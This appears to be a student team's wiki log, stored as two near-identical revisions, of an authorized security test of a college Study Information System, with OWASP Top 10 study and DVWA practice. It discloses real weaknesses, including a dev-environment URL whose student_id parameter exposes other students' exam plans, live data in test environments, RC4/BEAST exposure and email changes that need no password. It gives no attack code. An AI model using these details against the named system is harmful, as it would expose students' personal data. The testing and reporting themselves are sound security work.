*Jurij Lukjančikov, Vilnius University of Applied Sciences

==Goal==
*OWASP top 10
*HACK DVWA
*BackTrack, SamuraiCD (Last year experience)
*Scanning and testing tools - Qualys SSL Labs
*Acunetix Web Vulnerability Scanner v.8
*SubGraph Vega
*BEAST attack
*RC4

==Activity==
===Monday - 25.03.13===
'''Things what we did that day:'''
* Lectures
* Sumorobot programming
* Dinner @ St Patricks

===Tuesday - 26.03.13===
'''Things what we did that day:'''
* Documentation!
A1 Injection - Sandra 

A2 Broken Authentication and Session Management (was formerly A3) - Kestutis 

A3 Cross-Site Scripting (XSS) (was formerly A2) - Kestutis 

A4 Insecure Direct Object References - Markus 

A5 Security Misconfiguration (was formerly A6)- Tomas 

A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - Mika 

A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - Sten 

A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - Matis 

A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - Jurij 

A10 Unvalidated Redirects and Forwards - Sten 

'''Problems what we faced:'''
* Still need to get everyone a VM with DVWA running

'''Things what we plan to do:'''
* Copy Paste documentation tasks to Wiki :)
* Divide OWASP tasks

===Wednesday - 27.03.13===
'''Things what we did that day:'''
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti's presentation and Wireshark.
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)

'''Problems what we faced:'''
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it's nothing.

'''Things what we plan to do:'''
* Estonian members are going to study last year's report and going to make a short overview to other members about it.
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher's side as well, because teachers have a little more access than students (grades, information about student etc).
* In demo environment we are going to test new functions (what haven't been included in main environment, yet) - as there's some new functionality.

===Thursday - 28.03.13===
'''Things what we did that day:'''
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])
* Discussed the schedule and to-do list for next days
* Discussed some potential vulnerabilities of SIS
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.
* Prepared software for testing (Backtrack, Kali)

'''Problems what we faced:'''
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line ("Start here and go this way"), we will just need to start and see what we will find.

'''Things what we plan to do:'''
* Find attack examples for the vulnerabilities
* Try them out on DVWA
* Get familiar with Tamper Data, Kali and Backtrack
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS
* See how to get authentication info from POST and GET

'''Security threat of a day'''
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What's more -> developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!

===Friday - 29.03.13===
'''Things what we did that day:'''
* Learned how to perform attacks. We learned different attack methods and tried them out.
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.
* Talked about last year's experience. Tried if most of the security holes are patched or not.

'''Problems what we faced:'''
* We need student access to developer environment
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)

'''Things what we plan to do:'''
* Analysis of the results needs to be done
* Learn a little bit more about attacks
* Create some attacks
* Start to test simpler attacks to SIS

'''Security threats of the day:'''
* One can see other student's exam plan just by chaning student_id value in the URL (you don't need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to "My data" and just change ID from the URL again.
''For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322''

===Saturday - 30.03.13===
'''Things what we did that day:'''
* Visiting Tallinn TV Tower
* Visitinig The Seaplane Harbour

===Sunday - 31.03.13===
'''Free day'''

===Monday - 01.04.13===
'''NB! April fools' day!''' Beware!

'''Things what we did that day:'''
* We analyzed student information fields in "My data" section
* We test different sections and tried to change user IDs - luckily these are safe now.
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!
* Tried reflected XSS, most SIS areas escape "bad characters" out from input boxes.
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons ''(for example: other person taking exams claiming he/she is someone he/she is not)''

'''Problems what we faced:'''
* Still no new declaration etc opened for us. Maybe tomorrow?

'''Things what we plan to do:'''
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don't have much time left.
* Go deeper with different attacks and methods.

'''Security threat's of the day:'''
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user's cookies and then grant access to attacker.
* There's no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.
* Calendar: there's no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.
* There are some developer's notes left in different SIS parts (not only in developer environment).

===Tuesday - 02.04.13===
'''Things what we did that day:'''
* Visiting Skype office.
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.
* SIS is using a field called "security_key_sis_global". This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person's name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on "Forgot my password".

'''Problems what we faced:'''
* Really would have liked to have more time to test.

'''Things what we plan to do:'''
* Prepare and rehearse the presentation
* Look further into the e-mail modification issue.
* Finalise ASVS review

===Wednesday - 03.04.13===
'''Things what we did that day:'''
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to "audience".
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.

'''Problems what we faced:'''
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.

'''Things what we plan to do:'''
* We want to review and rehearse our final presentation.
* Update our documentation in Wiki.
* Upload and link presentations to persons and fill gaps in documentation.

===Thursday - 04.04.13===
'''Things what we did that day:'''
* Dress rehearsal. Updated presentation according to feedback and capabilities.
* Updated documentation to Wiki and uploaded missing presentations.
* Personal input section filling in Wiki.
* Went bowling. :)

'''Problems what we faced:'''
* Sometimes one minute feels like it is not a minute. :)

'''Things what we plan to do:'''
* Final documentation (link to Google docs).
* IP feedback
* Summarisation

===Friday - 05.04.13===
'''Things what we did that day:'''

'''Problems what we faced:'''

'''Things what we plan to do:'''

===Saturday - 06.04.13===
'''Departure! Bye bye!'''

==Materials (slides etc)==
* '''Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother'''
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)

* '''Day summarisation:'''
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]

* '''Security teamwork (whiteboard):'''
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)

* '''Virtual Machines (VM VirtualBox .ova files):
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]

* '''Final presentation of the project to the clients (4 April 2013)'''
** [[Media:2013_security_final_presentation.pdf|Presentation slides]] ''(Made by whole team, structure by Sandra and Jurij)''
** [http://echo360.e-uni.ee/ess/echo/presentation/d465007c-1582-4e58-ae0f-c7a2aa9af988 Video from echo360] ''(Team Security starts from 18:30)''

==Results==
Summary of what we did and solution what we developed

===Personal input===
====Sten Aus====
* '''What I did:'''
** I was selected as a group leader (project manager) on the first day (25 March). We decided also that this is a democracy not a tyranny. :)
** Helped others to use different kind of tools (Apache, Linux, DVWA, Wordpress etc, as I have dealt with them before (subjects in college with Margus, pre-school experience).
** Presentations to each other about OWASP TOP 10 ([[Media:2013_security_a7.pdf|A7 - Missing Function Level Access Control]] and [[Media:2013_security_a10.pdf|A10 - Unvalidated Redirects and Forwards]]).
** Demos about SIS vulnerabilities in different presentations (to group members, other participants and audience).

* '''What I learned:'''
** How to do documentation? I have documented my work before as well, but in such a big group as we had, it was first time experience for me.
** I learned how big value "same day feedback and summarisation" has.
** What security threats are out there and how to protect yourself (and your systems) against them. I have already taken different security measures into account in many web applications what I am using (or administering).

====Matis Palm====
* '''What I did:'''
** Helped teaching Apache & Linux & DVWA to other participants (due to having some experience already from before).
** Helping with sumorobot programming (Being from the robotics club).
** I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team.

* ''' What I learned:'''
** Learned alot about how to use and search information for security testing (XSS, CSRF and so on).
** I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on).

====Sandra Suviste====
* '''What I did:'''
** Researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection ([[Media:2013_security_a1.pdf|A1 - Injections]]).
** Practised attacks on the DVWA.
** Went through the OWASP ASVS document for possible shortcomings of the SIS.
** Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL.
** Documented my own and others' work.
** Together with Jurij we were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]]).

* '''What I learned:'''
** A lot about web application vulnerabilities - from my own research & practice and from others' presentations and teachers' lectures.
** Became more experienced in working in a multinational group with English as the working language.
** I learned how to document my work in order to keep track of the work of the team.
** I also learned what are the issues connected to the preparing of and giving a presentation with several (>3) presenters.

====Markus Rintamäki====
* '''What I did:'''
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a4.pdf|A4 - Insecure Direct Object References]]).
** Different attacks on SIS, changing user ids, SQL injection and XSS.
** Tried to upload a picture (for a lecturer) infected with malicious .php code.
** I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.
** Googeled a lot

* '''What I learned:'''
** My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did.
** Basic attack methods in DVWA: SQL injection, XSS and CSRF.
** What is SIS and how does it works?
** I also learned to program sumorobots, more about Linux and Wireshark.
** We made the presentation structure together.
** And also of course I learned to speak english more fluently. :)

====Tomas Lepistö====
* '''What I did:'''
** Tried to find out possible security holes from OIS site.
** Tested different attacking methods with DVWA
** SQL-injection tests into various places on OIS site.
** Tested some XSS methods
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a5.pdf|A5 - Misconfigured Configuration]]).
** Prepared our presentation with other group members
** Spoke in daily summary
** Studied a lot of information to know what is hacking about?

* '''What i learned:'''
** I learned how to use SQL-injection, XSS, Brute force, CSRF
** I learned also how to use Kali,Backtrack,Temper data, DVWA
** Working in international group
** How important documentation is
** Found out how important it is to make web-application secure

====Mika Salmela====
* '''What I did:'''
** I studied hacking methods
** Tried some hacking methods with DVWA
** Iscanned website, try to find if there is some security risks
** Tried some SQL and XSS injections
** OWASP TOP 10 presentations to each other [[Media:2013_security_a6.pdf|(A6 - Sensitive Data Exposure]]).

* '''What I learned:'''
** More than basics of how to hack?
** The most common hacking methods and how to use them.
** How to do SQL and XSS injections
** Basics of hacking tools
** How to find security risks
** How to work in international team.
** Learned much about what these are: DVWA, OWASP and ASVS.

====Kęstutis Tautvydas====
* '''What I did:'''
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a2.pdf|A2 - Broken Authentication and Session Management]] and [[Media:2013_security_a3.pdf|A3 - Cross-Site Scripting (XSS)]]).
** Searched for security holes in OIS student information site.
** Used DVWA tool to test sql injections and xss scripting.
** Tried some sql injections and xss scripting on OIS page
** Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates
** Prepared some slides for the main presentation

* '''What have I learned:'''
** Theory about OWASP TOP 10 threats
** How to do sql injections
** How to use Firefox tamperdata tool
** How to do cross-site scripting
** Completely understood what is use case and how to draw them
** How to monitor activities with Wireshark
** How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8

====Jurij Lukjančikov====
* '''What I did:'''
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a9.pdf|A9 - Using Known Vulnerable Components]])
** I and Sandra were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]])
** XSS and injection attacks to SIS

* '''What have I learned:'''
** I have learned about security breaches on the web.
** I have tried different parts of web for vulnerabilities and injection.
** Together with team learned how to make injection and XSS attacks using Linux (Linux was unfamiliar for me before that).

===Final documentation===
====Analysis====

====Solution====

==IP Feed-back==
===Feedback from Sten Aus===

===Feedback from Matis Palm===

===Feedback from Sandra Suviste===

===Feedback from Markus Rintamäki===

===Feedback from Tomas Lepistö===

===Feedback from Mika Salmela===

===Feedback from Kęstutis Tautvydas===

===Feedback from Jurij Lukjančikov===

Security

2013-04-05T06:20:45Z

Saus: /* Mika Salmela */

Team page for [[Deploying IT Infrastructure Solutions]].

==Team Members==
*Sten Aus, Estonian Information Technology College
*Matis Palm, Estonian Information Technology College
*Sandra Suviste, Estonian Information Technology College
*Markus Rintamäki, Vaasa University of Applied Sciences
*Tomas Lepistö, Vaasa University of Applied Sciences
*Mika Salmela, Vaasa University of Applied Sciences
*Kęstutis Tautvydas, Vilnius University of Applied Sciences
*Jurij Lukjančikov, Vilnius University of Applied Sciences

==Goal==
*OWASP top 10
*HACK DVWA
*BackTrack, SamuraiCD (Last year experience)
*Scanning and testing tools - Qualys SSL Labs
*Acunetix Web Vulnerability Scanner v.8
*SubGraph Vega
*BEAST attack
*RC4

==Activity==
===Monday - 25.03.13===
'''Things what we did that day:'''
* Lectures
* Sumorobot programming
* Dinner @ St Patricks

===Tuesday - 26.03.13===
'''Things what we did that day:'''
* Documentation!
A1 Injection - Sandra 

A2 Broken Authentication and Session Management (was formerly A3) - Kestutis 

A3 Cross-Site Scripting (XSS) (was formerly A2) - Kestutis 

A4 Insecure Direct Object References - Markus 

A5 Security Misconfiguration (was formerly A6)- Tomas 

A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - Mika 

A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - Sten 

A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - Matis 

A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - Jurij 

A10 Unvalidated Redirects and Forwards - Sten 

'''Problems what we faced:'''
* Still need to get everyone a VM with DVWA running

'''Things what we plan to do:'''
* Copy Paste documentation tasks to Wiki :)
* Divide OWASP tasks

===Wednesday - 27.03.13===
'''Things what we did that day:'''
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti's presentation and Wireshark.
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)

'''Problems what we faced:'''
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it's nothing.

'''Things what we plan to do:'''
* Estonian members are going to study last year's report and going to make a short overview to other members about it.
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher's side as well, because teachers have a little more access than students (grades, information about student etc).
* In demo environment we are going to test new functions (what haven't been included in main environment, yet) - as there's some new functionality.

===Thursday - 28.03.13===
'''Things what we did that day:'''
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])
* Discussed the schedule and to-do list for next days
* Discussed some potential vulnerabilities of SIS
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.
* Prepared software for testing (Backtrack, Kali)

'''Problems what we faced:'''
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line ("Start here and go this way"), we will just need to start and see what we will find.

'''Things what we plan to do:'''
* Find attack examples for the vulnerabilities
* Try them out on DVWA
* Get familiar with Tamper Data, Kali and Backtrack
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS
* See how to get authentication info from POST and GET

'''Security threat of a day'''
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What's more -> developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!

===Friday - 29.03.13===
'''Things what we did that day:'''
* Learned how to perform attacks. We learned different attack methods and tried them out.
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.
* Talked about last year's experience. Tried if most of the security holes are patched or not.

'''Problems what we faced:'''
* We need student access to developer environment
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)

'''Things what we plan to do:'''
* Analysis of the results needs to be done
* Learn a little bit more about attacks
* Create some attacks
* Start to test simpler attacks to SIS

'''Security threats of the day:'''
* One can see other student's exam plan just by chaning student_id value in the URL (you don't need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to "My data" and just change ID from the URL again.
''For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322''

===Saturday - 30.03.13===
'''Things what we did that day:'''
* Visiting Tallinn TV Tower
* Visitinig The Seaplane Harbour

===Sunday - 31.03.13===
'''Free day'''

===Monday - 01.04.13===
'''NB! April fools' day!''' Beware!

'''Things what we did that day:'''
* We analyzed student information fields in "My data" section
* We test different sections and tried to change user IDs - luckily these are safe now.
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!
* Tried reflected XSS, most SIS areas escape "bad characters" out from input boxes.
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons ''(for example: other person taking exams claiming he/she is someone he/she is not)''

'''Problems what we faced:'''
* Still no new declaration etc opened for us. Maybe tomorrow?

'''Things what we plan to do:'''
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don't have much time left.
* Go deeper with different attacks and methods.

'''Security threat's of the day:'''
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user's cookies and then grant access to attacker.
* There's no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.
* Calendar: there's no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.
* There are some developer's notes left in different SIS parts (not only in developer environment).

===Tuesday - 02.04.13===
'''Things what we did that day:'''
* Visiting Skype office.
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.
* SIS is using a field called "security_key_sis_global". This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person's name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on "Forgot my password".

'''Problems what we faced:'''
* Really would have liked to have more time to test.

'''Things what we plan to do:'''
* Prepare and rehearse the presentation
* Look further into the e-mail modification issue.
* Finalise ASVS review

===Wednesday - 03.04.13===
'''Things what we did that day:'''
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to "audience".
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.

'''Problems what we faced:'''
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.

'''Things what we plan to do:'''
* We want to review and rehearse our final presentation.
* Update our documentation in Wiki.
* Upload and link presentations to persons and fill gaps in documentation.

===Thursday - 04.04.13===
'''Things what we did that day:'''
* Dress rehearsal. Updated presentation according to feedback and capabilities.
* Updated documentation to Wiki and uploaded missing presentations.
* Personal input section filling in Wiki.
* Went bowling. :)

'''Problems what we faced:'''
* Sometimes one minute feels like it is not a minute. :)

'''Things what we plan to do:'''
* Final documentation (link to Google docs).
* IP feedback
* Summarisation

===Friday - 05.04.13===
'''Things what we did that day:'''

'''Problems what we faced:'''

'''Things what we plan to do:'''

===Saturday - 06.04.13===
'''Departure! Bye bye!'''

==Materials (slides etc)==
* '''Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother'''
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)

* '''Day summarisation:'''
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]

* '''Security teamwork (whiteboard):'''
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)

* '''Virtual Machines (VM VirtualBox .ova files):
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]

* '''Final presentation of the project to the clients (4 April 2013)'''
** [[Media:2013_security_final_presentation.pdf|Presentation slides]] ''(Made by whole team, structure by Sandra and Jurij)''
** [http://echo360.e-uni.ee/ess/echo/presentation/d465007c-1582-4e58-ae0f-c7a2aa9af988 Video from echo360] ''(Team Security starts from 18:30)''

==Results==
Summary of what we did and solution what we developed

===Personal input===
====Sten Aus====
* '''What I did:'''
** I was selected as a group leader (project manager) on the first day (25 March). We decided also that this is a democracy not a tyranny. :)
** Helped others to use different kind of tools (Apache, Linux, DVWA, Wordpress etc, as I have dealt with them before (subjects in college with Margus, pre-school experience).
** Presentations to each other about OWASP TOP 10 ([[Media:2013_security_a7.pdf|A7 - Missing Function Level Access Control]] and [[Media:2013_security_a10.pdf|A10 - Unvalidated Redirects and Forwards]]).
** Demos about SIS vulnerabilities in different presentations (to group members, other participants and audience).

* '''What I learned:'''
** How do do documentation? I have documented my work before as well, but in such a big group as we had, it was first time experience for me.
** I learned how big value "same day feedback and summarisation" has.
** What security threats are out there and how to protect yourself (and your systems) against them. I have already taken different security measures into account in many web applications what I am using (or administering).

====Matis Palm====
* '''What I did:'''
** Helped teaching Apache & Linux & DVWA to other participants (due to having some experience already from before).
** Helping with sumorobot programming (Being from the robotics club).
** I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team.

* ''' What I learned:'''
** Learned alot about how to use and search information for security testing (XSS, CSRF and so on).
** I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on).

====Sandra Suviste====
* '''What I did:'''
** Researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection ([[Media:2013_security_a1.pdf|A1 - Injections]]).
** Practised attacks on the DVWA.
** Went through the OWASP ASVS document for possible shortcomings of the SIS.
** Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL.
** Documented my own and others' work.
** Together with Jurij we were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]]).

* '''What I learned:'''
** A lot about web application vulnerabilities - from my own research & practice and from others' presentations and teachers' lectures.
** Became more experienced in working in a multinational group with English as the working language.
** I learned how to document my work in order to keep track of the work of the team.
** I also learned what are the issues connected to the preparing of and giving a presentation with several (>3) presenters.

====Markus Rintamäki====
* '''What I did:'''
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a4.pdf|A4 - Insecure Direct Object References]]).
** Different attacks on SIS, changing user ids, SQL injection and XSS.
** Tried to upload a picture (for a lecturer) infected with malicious .php code.
** I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.
** Googeled a lot

* '''What I learned:'''
** My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did.
** Basic attack methods in DVWA: SQL injection, XSS and CSRF.
** What is SIS and how does it works?
** I also learned to program sumorobots, more about Linux and Wireshark.
** We made the presentation structure together.
** And also of course I learned to speak english more fluently. :)

====Tomas Lepistö====
* '''What I did:'''
** Tried to find out possible security holes from OIS site.
** Tested different attacking methods with DVWA
** SQL-injection tests into various places on OIS site.
** Tested some XSS methods
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a5.pdf|A5 - Misconfigured Configuration]]).
** Prepared our presentation with other group members
** Spoke in daily summary
** Studied a lot of information to know what is hacking about?

* '''What i learned:'''
** I learned how to use SQL-injection, XSS, Brute force, CSRF
** I learned also how to use Kali,Backtrack,Temper data, DVWA
** Working in international group
** How important documentation is
** Found out how important it is to make web-application secure

====Mika Salmela====
* '''What I did:'''
** I studied hacking methods
** Tried some hacking methods with DVWA
** Iscanned website, try to find if there is some security risks
** Tried some SQL and XSS injections
** OWASP TOP 10 presentations to each other [[Media:2013_security_a6.pdf|(A6 - Sensitive Data Exposure]]).

* '''What I learned:'''
** More than basics of how to hack?
** The most common hacking methods and how to use them.
** How to do SQL and XSS injections
** Basics of hacking tools
** How to find security risks
** How to work in international team.
** Learned much about what these are: DVWA, OWASP and ASVS.

====Kęstutis Tautvydas====
